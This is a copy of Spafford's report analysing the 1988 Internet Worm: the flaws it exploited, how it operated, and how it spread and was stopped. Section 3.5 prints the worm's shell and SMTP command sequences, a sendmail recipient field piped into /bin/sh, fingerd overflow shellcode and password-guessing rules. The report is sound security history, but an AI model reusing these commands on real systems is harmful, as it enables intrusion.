搜档网
搜档网
当前位置:搜档网 › The internet worm incident

The internet worm incident

The internet worm incident
The internet worm incident

The Internet Worm Incident

Technical Report CSD-TR-933*

Eugene H.Spafford

Department of Computer Sciences

Purdue University

West Lafayette,IN USA47907-2004

spaf@https://www.sodocs.net/doc/0413104873.html,

On the evening of2November1988,someone‘‘infected’’the Internet with a worm program.That program exploited?aws in utility programs in systems based on BSD-derived versions of U NIX.The?aws allowed the program to break into those machines and copy itself,thus infecting those systems.This program eventually spread to thousands of machines,and disrupted normal activities and Internet connectivity for many days.

This paper explains why this program was a worm(as opposed to a virus),and provides a brief chronology of both the spread and eradication of the program.That is followed by discussion of some speci?c issues raised by the community’s reaction and subsequent discussion of the event.Included are some interesting lessons learned from the incident.

September19,1991

The Internet Worm Incident

Technical Report CSD-TR-933*

Eugene H.Spafford

Department of Computer Sciences

Purdue University

West Lafayette,IN USA47907-2004

spaf@https://www.sodocs.net/doc/0413104873.html,

1.Introduction

Worldwide,over60,000computers?in interconnecting networks communicate using a common set of protocols—the Internet Protocols(IP).[7,15]On the evening of2November1988this network(the Internet)came under attack from within.Sometime after5PM EST,a program was executed on one or more of these hosts.That program collected host,network,and user information,then used that informa-tion to establish network connections and break into other machines using?aws present in those systems’software.After breaking in,the program would replicate itself and the replica would attempt to infect other systems in the same manner.Although the program would only infect Sun Microsystems Sun3 systems,and V AX?computers running variants of4BSD?U NIX,?the program spread quickly,as did the confusion and consternation of system administrators and users as they discovered that their systems had been invaded.Although U NIX has long been known to have some security weaknesses(cf.[22], [13,21,29]),especially in its usual mode of operation in open research environments,the scope of the break-ins nonetheless came as a great surprise to almost everyone.

The program was mysterious to users at sites where it appeared.Unusual?les were left in the scratch(/usr/tmp)directories of some machines,and strange messages appeared in the log?les of some of the utilities,such as the sendmail mail handling agent.The most noticeable effect,however,was that sys-tems became more and more loaded with running processes as they became repeatedly infected.As time went on,some of these machines became so loaded that they were unable to continue any processing; some machines failed completely when their swap space or process tables were exhausted.

By early Thursday morning,November3,personnel at the University of California at Berkeley and Massachusetts Institute of Technology had‘‘captured’’copies of the program and began to analyze it. People at other sites also began to study the program and were developing methods of eradicating it.A common fear was that the program was somehow tampering with system resources in a way that could not be readily detected—that while a cure was being sought,system?les were being altered or informa-tion destroyed.By5AM EST Thursday morning,less than12hours after the program was?rst discovered on the network,the Computer Systems Research Group at Berkeley had developed an interim set of steps to halt its spread.This included a preliminary patch to the sendmail mail agent,and the suggestion to rename one or both of the C compiler and loader to prevent their use.These suggestions were published in mailing lists and on the Usenet network news system,although their spread was

*This paper appears in the Proceedings of the1989European Software Engineering Conference(ESEC89),pub-

lished by Springer-Verlag as#87in the‘‘Lecture Notes in Computer Science’’series.

?As presented by Mark Lottor at the October1988Internet Engineering Task Force(IETF)meeting in Ann Arbor,

MI.

?BSD is an acronym for Berkeley Software Distribution.

?U NIX is a registered trademark of AT&T Laboratories.

?V AX is a trademark of Digital Equipment Corporation.

hampered by systems disconnected from the Internet in an attempt to‘‘quarantine’’them.

By about9PM EST Thursday,another simple,effective method of stopping the invading program, without altering system utilities,was discovered at Purdue and also widely published.Software patches were posted by the Berkeley group at the same time to mend all the?aws that enabled the program to invade systems.All that remained was to analyze the code that caused the problems and discover who had unleashed the worm—and why.In the weeks that followed,other well-publicized computer break-ins occurred and many debates began about how to deal with the individuals staging these break-ins,who is responsible for security and software updates,and the future roles of networks and security.The conclu-sion of these discussions may be some time in coming because of the complexity of the topics,but the ongoing debate should be of interest to computer professionals everywhere.A few of those issues are summarized later.

After a brief discussion of why the November2nd program has been called a worm,this paper describes how the program worked.This is followed by a chronology of the spread and eradication of the Worm,and concludes with some observations and remarks about the community’s reaction to the whole incident,as well as some remarks about potential consequences for the author of the Worm.

2.Terminology

There seems to be considerable variation in the names applied to the program described here. Many people have used the term worm instead of virus based on its behavior.Members of the press have used the term virus,possibly because their experience to date has been only with that form of security problem.This usage has been reinforced by quotes from computer managers and programmers also unfamiliar with the difference.For purposes of clarifying the terminology,let me de?ne the difference between these two terms and give some citations as to their origins;these same de?nitions were recently given in[9]:

A worm is a program that can run independently and can propagate a fully working version of itself

to other machines.It is derived from the word tapeworm,a parasitic organism that lives inside a host and uses its resources to maintain itself.

A virus is a piece of code that adds itself to other programs,including operating systems.It cannot

run independently—it requires that its‘‘host’’program be run to activate it.As such,it has an ana-log to biological viruses—those viruses are not considered alive in the usual sense;instead,they invade host cells and corrupt them,causing them to produce new viruses.

2.1.Worms

The concept of a worm program that spreads itself from machine to machine was apparently?rst described by John Brunner in1975in his classic science?ction novel The Shockwave Rider.[5]He called these programs tapeworms that existed‘‘inside’’the computers and spread themselves to other machines. Ten years ago,researchers at Xerox PARC built and experimented with worm programs.They reported their experiences in1982in[25],and cited Brunner as the inspiration for the name worm.Although not the?rst self-replicating programs to run in a network environment,these were the?rst such programs to be called worms.

The worms built at PARC were designed to travel from machine to machine and do useful work in a distributed environment—they were not used at that time to break into systems.Because of this,some people prefer to call the Internet Worm a virus because it was destructive,and they believe worms are non-destructive.Not everyone agrees that the Internet Worm was destructive,however.Since intent and effect are sometimes dif?cult to judge because we lack complete information and have different de?nitions of those terms,using them as a naming criterion is clearly insuf?cient.Unless a different naming scheme is generally adopted,programs such as this one should be called worms because of their method of propagation.

2.2.Viruses

The?rst published use of the word virus(to my knowledge)to describe something that infects a computer was by David Gerrold in his science?ction short stories about the G.O.D.machine.These stories were later combined and expanded to form the book When Harlie Was One.[12]A subplot in that book described a program named VIRUS created by an unethical scientist.*A computer infected with VIRUS would randomly dial the phone until it found another computer.It would then break into that system and infect it with a copy of VIRUS.This program would in?ltrate the system software and slow the system down so much that it became unusable(except to infect other machines).The inventor had plans to sell a program named VACCINE that could cure VIRUS and prevent infection,but disaster occurred when noise on a phone line caused VIRUS to mutate so VACCINE ceased to be effective.

The term computer virus was?rst used in a formal way by Fred Cohen at USC.[6]He de?ned the term to mean a security problem that attaches itself to other code and turns it into something that pro-duces viruses;to quote from his paper:‘‘We de?ne a computer‘virus’as a program that can infect other programs by modifying them to include a possibly evolved copy of itself.’’He claimed the?rst com-puter virus was‘‘born’’on November3,1983,written by himself for a security seminar course,?and in his Ph.D.dissertation he credited his advisor,L.Adleman,with originating the terminology.However, there are accounts of virus programs being created at least a year earlier,including one written by a stu-dent at Texas A&M during early1982.*

2.3.An Opposing View

In a widely circulated paper[10],Eichin and Rochlis chose to call the November2nd program a virus.Their reasoning for this required reference to biological literature and observing distinctions between lytic viruses and lysogenic viruses.It further requires that we view the Internet as a whole to be the infected host rather than each individual machine.

Their explanation merely serves to underscore the dangers of co-opting terms from another discip-line to describe phenomena within our own(computing).The original de?nitions may be much more complex than we originally imagine,and attempts to maintain and justify the analogies may require a considerable effort.Here,it may also require an advanced degree in the biological sciences!

The de?nitions of worm and virus I have given,based on Cohen’s and Denning’s de?nitions,do not require detailed knowledge of biology or pathology.They also correspond well with our traditional understanding of what a computer‘‘host’’is.Although Eichin and Rochlis present a reasoned argument for a more precise analogy to biological viruses,we should bear in mind that the nomenclature has been adopted for the use of computer professionals and not biologists.The terminology should be descriptive, unambiguous,and easily https://www.sodocs.net/doc/0413104873.html,ing a nonintuitive de?nition of a‘‘computer host,’’and introduc-ing unfamiliar terms such as lysogenic does not serve these goals well.As such,the term worm should continue to be the name of choice for this program and others like it.

3.How the Worm Operated

The Worm took advantage of?aws in standard software installed on many U NIX systems.It also took advantage of a mechanism used to simplify the sharing of resources in local area networks.Speci?c patches for these?aws have been widely circulated in days since the Worm program attacked the Inter-net.Those?aws are described here,along with some related problems,since we can learn something about software design from them.This is then followed by a description of how the Worm used the ?aws to invade systems.

*The second edition of the book,recently published,has been‘‘updated’’to omit this subplot about VIRUS.

?It is ironic that the Internet Worm was loosed on November2,the eve of this‘‘birthday.’’

*Private communication,Joe Dellinger.

3.1.?ngerd and gets

The finger program is a utility that allows users to obtain information about other users.It is usu-ally used to identify the full name or login name of a user,whether a user is currently logged in,and pos-sibly other information about the person such as telephone numbers where he or she can be reached.The fingerd program is intended to run as a daemon,or background process,to service remote requests using the?nger protocol.[14]This daemon program accepts connections from remote programs,reads a single line of input,and then sends back output matching the received request.

The bug exploited to break fingerd involved overrunning the buffer the daemon used for input.The standard C language I/O library has a few routines that read input without checking for bounds on the buffer involved.In particular,the gets call takes input to a buffer without doing any bounds checking; this was the call exploited by the Worm.As will be explained later,the input overran the buffer allocated for it and rewrote the stack frame,thus altering the behavior of the program.

The gets routine is not the only routine with this?aw.There is a whole family of routines in the C library that may also overrun buffers when decoding input or formatting output unless the user explicitly speci?es limits on the number of characters to be converted.

Although experienced C programmers are aware of the problems with these routines,many con-tinue to use them.Worse,their format is in some sense codi?ed not only by historical inclusion in U NIX and the C language,but more formally in the forthcoming ANSI language standard for C.The hazard with these calls is that any network server or privileged program using them may possibly be comprom-ised by careful precalculation of the(in)appropriate input.

Interestingly,at least two long-standing?aws based on this underlying problem have recently been discovered in other standard BSD U NIX commands.Program audits by various individuals have revealed other potential problems,and many patches have been circulated since November to deal with these ?aws.Despite this,the library routines will continue to be used,and as our memory of this incident fades,new?aws may be introduced with their use.

3.2.Sendmail

The sendmail program is a mailer designed to route mail in a heterogeneous internetwork.[3]The program operates in several modes,but the one exploited by the Worm involves the mailer operating as a daemon(background)process.In this mode,the program is‘‘listening’’on a TCP port(#25)for attempts to deliver mail using the standard Internet protocol,SMTP(Simple Mail Transfer Protocol).[20] When such an attempt is detected,the daemon enters into a dialog with the remote mailer to determine sender,recipient,delivery instructions,and message contents.

The bug exploited in sendmail had to do with functionality provided by a debugging option in the code.The Worm would issue the DEBUG command to sendmail and then specify the recipient of the message as a set of commands instead of a user address.In normal operation,this is not allowed,but it is present in the debugging code to allow testers to verify that mail is arriving at a particular site without the need to invoke the address resolution routines.By using this feature,testers can run programs to display the state of the mail system without sending mail or establishing a separate login connection. This debug option is often used because of the complexity of con?guring sendmail for local conditions and it is often left turned on by many vendors and site administrators.

The sendmail program is of immense importance on most Berkeley-derived(and other)U NIX sys-tems because it handles the complex tasks of mail routing and delivery.Yet,despite its importance and widespread use,most system administrators know little about how it works.Stories are often related about how system administrators will attempt to write new device drivers or otherwise modify the kernel of the operating system,yet they will not willingly attempt to modify sendmail or its con?guration?les.

It is little wonder,then,that bugs are present in sendmail that allow unexpected behavior.Other ?aws have been found and reported now that attention has been focused on the program,but it is not known for sure if all the bugs have been discovered and all the patches circulated.

3.3.Passwords

A key attack of the Worm program involved attempts to discover user passwords.It was able to determine success because the encrypted password*of each user was in a publicly-readable?le.In U NIX systems,the user provides a password at sign-on to verify identity.The password is encrypted using a permuted version of the Data Encryption Standard(DES)algorithm,and the result is compared against a previously encrypted version present in a world-readable accounting?le.If a match occurs,access is allowed.No plaintext passwords are contained in the?le,and the algorithm is supposedly non-invertible without knowledge of the password.

The organization of the passwords in U NIX allows non-privileged commands to make use of infor-mation stored in the accounts?le,including authenti?cation schemes using user passwords.However,it also allows an attacker to encrypt lists of possible passwords and then compare them against the actual passwords without calling any system function.In effect,the security of the passwords is provided by the prohibitive effort of trying this approach with all combinations of letters.Unfortunately,as machines get faster,the cost of such attempts decreases.Dividing the task among multiple processors further reduces the time needed to decrypt a password.Such attacks are also made easier when users choose obvious or common words for their passwords.An attacker need only try lists of common words until a match is found.

The Worm used such an attack to break passwords.It used lists of words,including the standard online dictionary,as potential passwords.It encrypted them using a fast version of the password algo-rithm and then compared the result against the contents of the system?le.The Worm exploited the accessibility of the?le coupled with the tendency of users to choose common words as their passwords. Some sites reported that over50%of their passwords were quickly broken by this simple approach.

One way to reduce the risk of such attacks,and an approach that has already been taken in some variants of U NIX,is to have a shadow password?le.The encrypted passwords are saved in a?le(sha-dow)that is readable only by the system administrators,and a privileged call performs password encryp-tions and comparisons with an appropriate timed delay(.5to1second,for instance).This would prevent any attempt to‘‘?sh’’for passwords.Additionally,a threshold could be included to check for repeated password attempts from the same process,resulting in some form of alarm being raised.Shadow pass-word?les should be used in combination with encryption rather than in place of such techniques,how-ever,or one problem is simply replaced by a different one(securing the shadow?le);the combination of the two methods is stronger than either one alone.

Another way to strengthen the password mechanism would be to change the utility that sets user passwords.The utility currently makes minimal attempt to ensure that new passwords are nontrivial to guess.The program could be strengthened in such a way that it would reject any choice of a word currently in the on-line dictionary or based on the account name.

A related?aw exploited by the Worm involved the use of trusted logins.One useful features of BSD U NIX-based networking code is its support for executing tasks on remote machines.To avoid hav-ing repeatedly to type passwords to access remote accounts,it is possible for a user to specify a list of host/login name pairs that are assumed to be‘‘trusted,’’in the sense that a remote access from that host/login pair is never asked for a password.This feature has often been responsible for users gaining unauthorized access to machines(cf.[21]),but it continues to be used because of its great convenience.

The Worm exploited the mechanism by trying to locate machines that might‘‘trust’’the current machine/login being used by the Worm.This was done by examining?les that listed remote machine/logins trusted by the current host.*Often,machines and accounts are con?gured for reciprocal trust.Once the Worm found such likely candidates,it would attempt to instantiate itself on those machines by using the remote execution facility—copying itself to the remote machines as if it were an authorized user performing a standard remote operation.

*Strictly speaking,the password is not encrypted.A block of zero bits is repeatedly encrypted using the user pass-

word,and the results of this encryption is what is saved.See[4]and[19]for more details.

*The hosts.equiv and per-user.rhosts?les referred to later.

To defeat future such attempts requires that the current remote access mechanism be removed and possibly replaced with something else.One mechanism that shows promise in this area is the Kerberos authenti?cation server[28].This scheme uses dynamic session keys that need to be updated periodically. Thus,an invader could not make use of static authorizations present in the?le system.

3.4.High Level Description

The Worm consisted of two parts:a main program,and a bootstrap or vector program.The main program,once established on a machine,would collect information on other machines in the network to which the current machine could connect.It would do this by reading public con?guration?les and by running system utility programs that present information about the current state of network connections. It would then attempt to use the?aws described above to establish its bootstrap on each of those remote machines.

The bootstrap was99lines of C code that would be compiled and run on the remote machine.The source for this program would be transferred to the victim machine using one of the methods discussed in the next section.It would then be compiled and invoked on the victim machine with three command line arguments:the network address of the infecting machine,the number of the network port to connect to on that machine to get copies of the main Worm?les,and a magic number that effectively acted as a one-time-challenge password.If the‘‘server’’Worm on the remote host and port did not receive the same magic number back before starting the transfer,it would immediately disconnect from the vector pro-gram.This may have been done to prevent someone from attempting to‘‘capture’’the binary?les by spoo?ng a Worm‘‘server.’’

This code also went to some effort to hide itself,both by zeroing out its argument vector(command line image),and by immediately forking a copy of itself.If a failure occurred in transferring a?le,the code deleted all?les it had already transferred,then it exited.

Once established on the target machine,the bootstrap would connect back to the instance of the Worm that originated it and transfer a set of binary?les(precompiled code)to the local machine.Each binary?le represented a version of the main Worm program,compiled for a particular computer architec-ture and operating system version.The bootstrap would also transfer a copy of itself for use in infecting other systems.One curious feature of the bootstrap has provoked many questions,as yet unanswered:the program had data structures allocated to enable transfer of up to20?les;it was used with only three. This has led to speculation whether a more extensive version of the Worm was planned for a later date, and if that version might have carried with it other command?les,password data,or possibly local virus or trojan horse programs.

Once the binary?les were transferred,the bootstrap program would load and link these?les with the local versions of the standard libraries.One after another,these programs were invoked.If one of them ran successfully,it read into its memory copies of the bootstrap and binary?les and then deleted the copies on disk.It would then attempt to break into other machines.If none of the linked versions ran, then the mechanism running the bootstrap(a command?le or the parent worm)would delete all the disk ?les created during the attempted infection.

3.5.Step-by-step description

This section contains a more detailed overview of how the Worm program functioned.The description in this section assumes that the reader is somewhat familiar with standard U NIX commands and with BSD U NIX network facilities.A more detailed analysis of operation and components can be found in[26],with additional details in[10]and[24].

This description starts from the point at which a host is about to be infected.A Worm running on another machine has either succeeded in establishing a shell on the new host and has connected back to the infecting machine via a TCP connection,*or it has connected to the SMTP port and is transmitting to the sendmail program.

*Internet reliable stream connection.

The infection proceeded as follows:

1)A socket was established on the infecting machine for the vector program to connect to(e.g.,socket

number32341).A challenge string was constructed from a random number(e.g.,8712440).A?le

name base was also constructed using a random number(e.g.,14481910).

2)The vector program was installed and executed using one of two methods:

2a)Across a TCP connection to a shell,the Worm would send the following commands(the two

lines beginning with‘‘cc’’were sent as a single line):

PATH=/bin:/usr/bin:/usr/ucb

cd/usr/tmp

echo gorch49;sed’/int zz/q’>x14481910.c;echo gorch50

[text of vector program]

int zz;

cc-o x14481910x14481910.c;./x14481910128.32.134.16323418712440;

rm-f x14481910x14481910.c;echo DONE

Then it would wait for the string‘‘DONE’’to signal that the vector program was running.

2b)Using the SMTP connection,it would transmit(the two lines beginning with‘‘cc’’were sent

as a single line):

debug

mail from:

rcpt to:<"|sed-e’1,/^$/’d|/bin/sh;exit0">

data

cd/usr/tmp

cat>x14481910.c<<’EOF’

[text of vector program]

EOF

cc-o x14481910x14481910.c;x14481910128.32.134.16323418712440;

rm-f x14481910x14481910.c

.

quit

The infecting Worm would then wait for up to2minutes on the designated port for the vector to

contact it.

3)The vector program then connected to the‘‘server,’’sent the challenge string,and transferred three

?les:a Sun3binary version of the Worm,a V AX version,and the source code for the vector pro-

gram.After the?les were copied,the running vector program became(via the execl call)a shell

with its input and output still connected to the server Worm.

4)The server Worm sent the following command stream to the connected shell:

PATH=/bin:/usr/bin:/usr/ucb

rm-f sh

if[-f sh]

then

P=x14481910

else

P=sh

fi

Then,for each binary?le it had transferred(just two in this case,although the code is written to allow more),it would send the following form of command sequence:

cc-o$P x14481910,sun3.o

./$P-p$$x14481910,sun3.o x14481910,vax.o x14481910,l1.c rm-f$P

The rm would succeed only if the linked version of the Worm failed to start execution.If the server determined that the host was now infected,it closed the connection.Otherwise,it would try the other binary?le.After both binary?les had been tried,it would send over rm commands for the object?les to clear away all evidence of the attempt at infection.

5)The new Worm on the infected host proceeded to‘‘hide’’itself by obscuring its argument vector,

unlinking the binary version of itself,and killing its parent(the$$argument in the invocation).It then read into memory each of the Worm binary?les,encrypted each?le after reading it,and deleted the?les from disk.

6)Next,the new Worm gathered information about network interfaces and hosts to which the local

machine was connected.It built lists of these in memory,including information about canonical and alternate names and addresses.It gathered some of this information by making direct ioctl calls,and by running the netstat program with various arguments.*It also read through various sys-tem?les looking for host names to add to its database.

7)It randomized the lists of hosts it constructed,then attempted to infect some of them.For directly

connected networks,it created a list of possible host numbers and attempted to infect those hosts if they existed.Depending on whether the host was remote or attached to a local area network the Worm?rst tried to establish a connection on the telnet or rexec ports to determine reachability before it attempted an infection.

8)The infection attempts proceeded by one of three routes:rsh,fingerd,or sendmail.

8a)The attack via rsh was done by attempting to spawn a remote shell by invocation of(in order of trial)/usr/ucb/rsh,/usr/bin/rsh,and/bin/rsh.If successful,the host was infected as in steps

1and2a,above.

8b)The attack via the finger daemon was somewhat more subtle.A connection was established to the remote finger server daemon and then a specially constructed string of536bytes was

passed to the daemon,over?owing its512byte input buffer and overwriting parts of the

stack.For standard4BSD versions running on V AX computers,the over?ow resulted in the

return stack frame for the main routine being changed so that the return address pointed into

the buffer on the stack.The instructions that were written into the stack at that location were

a series of no-ops followed by:

pushl$68732f’/sh\0’

pushl$6e69622f’/bin’

movl sp,r10

pushl$0

pushl$0

pushl r10

pushl$3

movl sp,ap

chmk$3b

That is,the code executed when the main routine attempted to return was:

*Ioctl is a U NIX call to do device queries and https://www.sodocs.net/doc/0413104873.html,stat is a status and monitor program showing the state of

network connections.

execve("/bin/sh",0,0)

On V AX en,this resulted in the Worm connected to a remote shell via the TCP connection.

The Worm then proceeded to infect the host as in steps1and2a,above.On Suns,this sim-

ply resulted in a core dump since the code was not in place to corrupt a Sun version of

fingerd in a similar fashion.Curiously,correct machine-speci?c code to corrupt Suns could

have been written in a matter of hours and included but was not.[26]

8c)The Worm then tried to infect the remote host by establishing a connection to the SMTP port and mailing an infection,as in step2b,above.

Not all the steps were attempted.As soon as one method succeeded,the host entry in the internal list was marked as infected and the other methods were not attempted.

9)Next,it entered a state machine consisting of?ve states.Each state but the last was run for a short

while,then the program looped back to step#7(attempting to break into other hosts via sendmail, finger,or rsh).The?rst four of the?ve states were attempts to break into user accounts on the local machine.The?fth state was the?nal state,and occurred after all attempts had been made to break all passwords.In the?fth state,the Worm looped forever trying to infect hosts in its internal tables and marked as not yet infected.The?rst four states were:

9a)The Worm read through the/etc/hosts.equiv?les and/.rhosts?les to?nd the names of equivalent hosts.These were marked in the internal table of hosts.Next,the Worm read

/etc/passwd(the account and password?le)into an internal data structure.As it was doing

this,it also examined the.forward?le(used to forward mail to a different host automatically)

in each user home directory and included any new host names into its internal table of hosts

to try.Oddly,it did not similarly check user.rhosts?les.

9b)The Worm attempted to break each user password using simple choices.The Worm?rst checked the obvious case of no password.Then,it used the account name and user informa-

tion?eld to try simple passwords.Assume that the user had an entry in the password?le

like:

account:abcedfghijklm:100:5:User,Name:/usr/account:/bin/sh

(These represent,respectively,the account name,the encrypted password,the user ID

number,the user’s default group ID number,per-user information?eld,the pathname of the

user’s home account,and the pathname of the user’s default command interpreter or shell.)

The words tried as potential passwords would be account,accountaccount,User,Name,user,

name,and tnuocca.These are,respectively,the account name,the account name concatenated

with itself,the?rst and last names of the user,the user names with leading capital letters

turned to lower case,and the account name reversed.Experience described in[13]shows that

on systems where users are naive about proper password security,these choices may work for

a signi?cant percentage of user accounts.

Step10in this section describes what was done if a password‘‘hit’’was achieved.

9c)The third stage in the process involved trying to break the password of each user by trying each word present in an internal dictionary of words(available in[26]).This dictionary of

432words was tried against each account in a random order,with‘‘hits’’being handled as

described in step10,below.

9d)The fourth stage was entered if all other attempts failed.For each word in the online diction-ary,the Worm would see if it was the password to any account.In addition,if the word in

the dictionary began with an upper case letter,the letter was converted to lower case and that

word was also tried against all the passwords.

10)Once a password was broken for any account,the Worm would attempt to break into remote

machines where that user had accounts.The Worm would scan the.forward and.rhosts?les of the user at this point,and identify the names of remote hosts that had accounts used by the target user.

It then attempted two attacks:

10a)The Worm would?rst attempt to create a remote shell using the rexec*service.The attempt would be made using the account name given in the.forward or.rhosts?le and the user’s

local password.This took advantage of users’tendency to use the same password on their

accounts on multiple machines.

10b)The Worm would do a rexec to the current host(using the local user name and password) and would try a rsh command to the remote host using the username taken from the?le.

This attack would succeed when the remote machine had a hosts.equiv?le or the user had a

.rhosts?le that allowed remote execution without a password.

If the remote shell was created either way,the attack would continue as in steps1and2a,above.

No other use was made of the user password.

Throughout the execution of the main loop,the Worm would check for other Worms running on the same machine.To do this,the Worm would attempt to connect to another Worm on a local,predeter-mined TCP socket.?If such a connection succeeded,one Worm would(randomly)set an internal variable named pleasequit to1,causing that Worm to exit after it had reached part way into the third stage(9c)of password cracking.This delay is part of the reason many systems had multiple Worms running:even though a Worm would check for other local Worms,it would defer its self-destruction until signi?cant effort had been made to break local passwords.Furthermore,race conditions in the code made it possible for Worms on heavily loaded machines to fail to connect,thus causing some of them to continue inde?nitely despite the presence of other Worms.

One out of every seven Worms would become‘‘immortal’’rather than check for other local Worms.Based on a generated random number they would set an internal?ag that would prevent them from ever looking for another Worm on their host.This may have been done to defeat any attempt to put a fake Worm process on the TCP port to kill existing Worms.Whatever the reason,this was likely the primary cause of machines being overloaded with multiple copies of the Worm.

The Worm attempted to send a UDP packet to the host https://www.sodocs.net/doc/0413104873.html,?approximately once every15infections,based on a random number comparison.The code to do this was incorrect,however, and no information was ever sent.Whether this was the intended ruse or whether there was some reason for the byte to be sent is not currently known.However,the code is such that an uninitialized byte is the intended message.It is possible that the author eventually intended to run some monitoring program on ernie(after breaking into an account,perhaps).Such a program could obtain the sending host number from the single-byte message,whether it was sent as a TCP or UDP packet.However,no evidence for such a program has been found and it is possible that the connection was simply a feint to cast suspicion on personnel at Berkeley.

The Worm would also fork itself on a regular basis and kill its parent.This has two effects.First, the Worm appeared to keep changing its process identi?er and no single process accumulated excessive amounts of cpu time.Secondly,processes that have been running for a long time have their priority downgraded by the scheduler.By forking,the new process would regain normal scheduling priority. This mechanism did not always work correctly,either,as locally we observed some instances of the Worm with over600seconds of accumulated cpu time.

If the Worm was present on a machine for more than12hours,it would?ush its host list of all entries?agged as being immune or already infected.The way hosts were added to this list implies that a single Worm might reinfect the same machines every12hours.

4.Chronology

What follows is an abbreviated chronology of events relating to the release of the Internet Worm. Most of this information was gathered from personal mail,submissions to mailing lists,and Usenet post-ings.Some items were taken from[24] and[1], and are marked accordingly.This is certainly not a

*rexec is a remote command execution service.It requires that a username/password combination be supplied as part

of the request.

?This was compiled in as port number23357,on host127.0.0.1(loopback).

?Using TCP port11357on host128.32.137.13.UDP is an Internet unreliable data packet transmission protocol.

complete chronology—many other sites were affected by the Worm but are not listed here.Note that because of clock drift and machine crashes,some of the times given here may not be completely accurate. They should convey an approximation to the sequence of events,however.All times are given in Eastern Standard Time.

It is particularly interesting to note how quickly and how widely the Worm spread.It is also signi?cant to note how quickly it was identi?ed and stopped by an ad hoc collection of‘‘Worm hunters’’using the same network to communicate their results.

November2,1988

~1700Worm executed on a machine at Cornell University.(NCSC)Whether this was a last test or the initial execution is not known.

~1800Machine https://www.sodocs.net/doc/0413104873.html, at MIT infected.(Seely,mail)This may have been the initial exe-cution.Prep is a public-access machine,used for storage and distribution of GNU project

software.It is con?gured with some notorious security holes that allow anonymous remote

users to introduce?les into the system.

1830Infected machine at the University of Pittsburgh infects a machine at the RAND Corpora-tion.(NCSC)

2100Worm discovered on machines at Stanford.(NCSC)

2130First machine at the University of Minnesota invaded.(mail)

2204Gateway machine at University of California,Berkeley invaded.Mike Karels and Phil Lapsley discover this shortly afterwards because they noticed an unusual load on the

machine.(mail)

2234Gateway machine at Princeton University infected.(mail)

~2240Machines at the University of North Carolina are infected and attempt to invade other machines.Attempts on machines at MCNC(Microelectronics Center of North Carolina)

start at2240.(mail)

2248Machines at SRI infected via sendmail.(mail)

2252Worm attempts to invade machine https://www.sodocs.net/doc/0413104873.html, at Carnegie-Mellon University.(mail) 2254Gateway hosts at the University of Maryland come under attack via?ngerd daemon.Evi-dence is later found that other local hosts are already infected.(mail)

2259Machines at University of Pennsylvania attacked,but none are susceptible.Logs will later show210attempts over next12hours.(mail)

~2300AI Lab machines at MIT infected.(NCSC)

https://www.sodocs.net/doc/0413104873.html, at University of Maryland is infected via sendmail.(mail)

2340Researchers at Berkeley discover sendmail and rsh as means of attack.They begin to shut off other network services as a precaution.(Seeley)

2345Machines at Dartmouth and the Army Ballistics Research Lab(BRL)attacked and infected.

(mail,NCSC)

2349Gateway machine at the University of Utah infected.In the next hour,the load average will soar to100*because of repeated infections.(Seeley)

November3,1988

0007University of Arizona machine https://www.sodocs.net/doc/0413104873.html, infected.(mail)

0021Princeton University main machine(a V AX8650)infected.Load average reaches68and the machine crashes.(mail)

0033Machine https://www.sodocs.net/doc/0413104873.html, at the University of Delaware infected,but not by sendmail.(mail) 0105Worm invades machines at Lawrence Livermore Labs(LLL).(NCSC)

0130Machines at UCLA infected.(mail)

*The load average is an indication of how many processes are on the ready list awaiting their turn to execute.The

normal load for a gateway machine is usually below10during off-hours.

0200The Worm is detected on machines at Harvard University.(NCSC)

0238Peter Yee at Berkeley posts a message to the TCP-IP mailing list:‘‘We are under attack.’’Affected sites mentioned in the posting include U.C.Berkeley,U.C.San Diego,LLL,

Stanford,and NASA Ames.(mail)

~0315Machines at the University of Chicago are infected.One machine in the Physics department logs over225infection attempts via?ngerd from machines at Cornell during the time period

midnight to0730.(mail)

0334Warning about the Worm is posted anonymously(from‘‘foo@bar.arpa’’)to the TCP-IP mailing list:‘‘There may be a virus loose on the internet.’’What follows are three brief

statements of how to stop the Worm,followed by‘‘Hope this helps,but more,I hope it is a

hoax.’’The poster is later revealed to be Andy Sudduth of Harvard,who was phoned by the

Worm’s alleged author,Robert T.Morris.Due to network and machine loads,the warning

is not propagated for well over24hours.(mail,Seeley)

~0400Colorado State University attacked.(mail)

~0400Machines at Purdue University infected.

0554Keith Bostic mails out a warning about the Worm,plus a patch to sendmail.His posting goes to the TCP-IP list,the Usenix4bsd-ucb-?xes newsgroup,and selected site administra-

tors around the country.(mail,Seeley)

0645Clifford Stoll calls the National Computer Security Center and informs them of the Worm.

(NCSC)

~0700Machines at Georgia Institute of Technology are infected.Gateway machine(a Vax780) load average begins climb past30.(mail)

0730I discover infection on machines at Purdue University.Machines are so overloaded I cannot read my mail or news,including mail from Keith Bostic about the Worm.Believing this to

be related to a recurring hardware problem on the machine,I request that the system be res-

tarted.

0807Edward Wang at Berkeley unravels?ngerd attack,but his mail to the systems group is not read for more than12hours.(mail)

0818I read Keith’s mail.I forward his warning to the Usenet news.announce.important news-group,to the nntp-managers mailing list,and to over30other site admins.This is the?rst

notice most of these people get about the Worm.This group exchanges mail all day about

progress and behavior of the Worm,and eventually becomes the phage mailing list based at

Purdue with over300recipients.

~0900Machines on Nysernet found to be infected.(mail)

1036I mail?rst description of how the Worm works to the mailing list and to the Risks Digest.

The?ngerd attack is not yet known.

1130The Defense Communications Agency inhibits the mailbridges between Arpanet and Milnet.

(NCSC)

1200Over120machines at SRI in the Science&Technology center are shut down.Between1/3 and1/2are found to be infected.(mail)

1450Personnel at Purdue discover machines with patched versions of sendmail reinfected.I mail and post warning that the sendmail patch by itself is not suf?cient protection.This was

known at various sites,including Berkeley and MIT,over12hours earlier but never publi-

cized.

1600System admins of Purdue systems meet to discuss local strategy.Captured versions of the Worm suggest a way to prevent infection:create a directory named sh in the/usr/tmp direc-

tory.

1800Mike Spitzer and Mike Rowan of Purdue discover how the?nger bug works.A mailer error causes their explanation to fail to leave Purdue machines.

1900Bill Sommer?eld of MIT recreates?ngerd attack and phones Berkeley with this information.

Nothing is mailed or posted about this avenue of attack.(mail,Seeley)

1919Keith Bostic posts and mails new patches for sendmail and?ngerd.They are corrupted in transit.Many sites do not receive them until the next day.(mail,Seeley)

1937Tim Becker of the University of Rochester mails out description of the?ngerd attack.This one reaches the phage mailing list.(mail)

2100My original mail about the Worm,sent at0818,?nally reaches the University of Maryland.

(mail)

2120Personnel at Purdue verify,after repeated attempts,that creating a directory named sh in /usr/tmp prevents infection.I post this information to phage.

